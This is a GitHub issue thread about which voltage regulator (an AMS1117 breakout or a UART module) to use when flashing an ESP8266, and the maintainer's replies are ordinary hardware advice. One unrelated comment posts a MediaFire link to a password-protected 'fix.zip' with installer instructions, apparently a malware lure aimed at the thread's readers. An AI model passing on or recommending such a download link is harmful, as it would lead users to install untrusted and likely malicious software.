### ISSUE TITLE
Which regulator is used?

### ISSUE THREAD

**Issue by fredsco** [nopnop2002/python-esp8266#2]
I want to flash the ESP but not sure which regulator you are using, could you please tell me the model?

**Comment by nopnop2002** [comment]
Any regulator that can convert 5V to 3.3V can be used, but one with as large an output current as possible is preferable.

 I used AMS1117 breakout.   
AMS1117 can supply 500mA.
This breakout is equipped with a capacitor, so no other components are required.
I bought 10 pieces for $2.78.

![AMS1117-1](https://github.com/user-attachments/assets/2e50876b-a39e-43bb-9c86-92ab9d18274a)
![AMS1117-2](https://github.com/user-attachments/assets/e4b1f4c5-e88d-4eb5-b2bf-2012622a0859)
![AMS1117-3](https://github.com/user-attachments/assets/582ed2ec-6344-4d68-b3cb-aa398537687f)

We can get a module for UART communication.   
We can write AT firmware to this.   
It has a 5V->3.3V regulator and can supply power directly from 5V.   
Although it supplies 5V power, the TTL level of UART is 3.3V.   
![ESP-UART-MODULE-1](https://user-images.githubusercontent.com/6020549/104827197-b504cd80-589e-11eb-95a8-f12c75670ced.JPG)

![ESP-UART-MODULE-2](https://user-images.githubusercontent.com/6020549/104827200-b8985480-589e-11eb-9a01-e70d4fbd55cc.JPG)

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nopnop2002** [comment]
Added information about regulators to README.
